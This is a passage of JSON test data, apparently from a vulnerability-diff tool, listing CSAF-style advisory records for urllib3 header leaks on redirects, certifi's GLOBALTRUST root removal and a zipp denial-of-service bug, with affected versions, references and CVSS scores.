"2024-06-17T21:37:20", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-37891"}, {"system_name": "GitHub Advisory", "text": "GHSA-34jh-p97f-mpxf"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects  When using urllib3's proxy support with `ProxyManager`, the `Proxy-Authorization` header is only sent to the configured proxy, as expected.  However, when sending HTTP requests *without* using urllib3's proxy support, it's possible to accidentally configure the `Proxy-Authorization` header even though it won't have any effect as the request is not using a forwarding proxy or a tunneling proxy. In those cases, urllib3 doesn't treat the `Proxy-Authorization` HTTP header as one carrying authentication material and thus doesn't strip the header on cross-origin redirects.  Because this is a highly unlikely scenario, we believe the severity of this vulnerability is low for almost all users. Out of an abundance of caution urllib3 will automatically strip the `Proxy-Authorization` header during cross-origin redirects to avoid the small chance that users are doing this on accident.  Users should use urllib3's proxy support or disable automatic redirects to achieve safe processing of the `Proxy-Authorization` header, but we still decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Setting the `Proxy-Authorization` header without using urllib3's built-in proxy support. * Not disabling HTTP redirects. * Either not using an HTTPS origin server or for the proxy or target origin to redirect to a malicious origin.  ## Remediation  * Using the `Proxy-Authorization` header with urllib3's `ProxyManager`. * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Proxy-Authorization` header."}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's Proxy-Authorization request header isn't stripped during cross-origin redirects "}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"], "known_not_affected": ["urllib3@2.2.2"]}, "references": [{"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "GitHub Advisory GHSA-34jh-p97f-mpxf", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-34jh-p97f-mpxf"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37891"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.2.2"]}], "title": "CVE-2024-37891/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}], "cve": "CVE-2024-39689", "cwe": {"id": "345", "name": "Insufficient Verification of Data Authenticity"}, "discovery_date": "2024-07-05T20:06:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-39689"}, {"system_name": "GitHub Advisory", "text": "GHSA-248v-346w-9cwc"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Certifi removes GLOBALTRUST root certificate Certifi 2024.07.04 removes root certificates from \"GLOBALTRUST\" from the root store. These are in the process of being removed from Mozilla's trust store.  GLOBALTRUST's root certificates are being removed pursuant to an investigation which identified \"long-running and unresolved compliance issues\". Conclusions of Mozilla's investigation can be found [here]( https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI)."}, {"category": "description", "details": "Vulnerability Description", "text": "Certifi removes GLOBALTRUST root certificate"}], "product_status": {"known_affected": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"], "known_not_affected": ["certifi@2024.07.04"]}, "references": [{"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "GitHub Advisory GHSA-248v-346w-9cwc", "url": "https://github.com/certifi/python-certifi/security/advisories/GHSA-248v-346w-9cwc"}, {"summary": "Google Mailing List", "url": "https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/XpknYMPO8dI"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39689"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "environmentalScore": 3.1, "environmentalSeverity": "LOW", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 3.1, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.1"}, "products": ["certifi@vers:pypi/>=2021.05.30|<2024.07.04"]}], "title": "CVE-2024-39689/pkg:pypi/certifi@2023.7.22"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-5569"]}], "cve": "CVE-2024-5569", "cwe": {"id": "400", "name": "Uncontrolled Resource Consumption"}, "discovery_date": "2024-07-09T00:31:40", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-5569"}, {"system_name": "Huntr Advisory", "text": "be898306-11f9-46b4-b28c-f4c4aa4ffbae"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# zipp Denial of Service vulnerability A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the `Path` module in both zipp and zipfile, such as `joinpath`, the overloaded division operator, and `iterdir`. Although the infinite loop is not resource exhaustive, it prevents the application from responding. The vulnerability was addressed in version 3.19.1 of jaraco/zipp."}, {"category": "description", "details": "Vulnerability Description", "text": "zipp Denial of Service vulnerability"}], "product_status": {"known_affected": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"], "known_not_affected": ["zipp@3.19.1"]}, "references": [{"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "Huntr Advisory be898306-11f9-46b4-b28c-f4c4aa4ffbae", "url": "https://huntr.com/bounties/be898306-11f9-46b4-b28c-f4c4aa4ffbae"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-5569"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "environmentalScore": 6.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "LOCAL", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 6.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0"}, "products": ["zipp@vers:pypi/>=0.1.0|<=3.19.0"]}], "title": "CVE-2024-5569/pkg:pypi/zipp@3.16.2"}]}, "diff_summary": {"test/csaf_1.json": {"vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.  Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin.  ## Remediation  * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header.  ## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}, {"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {}}}}
\ No newline at end of file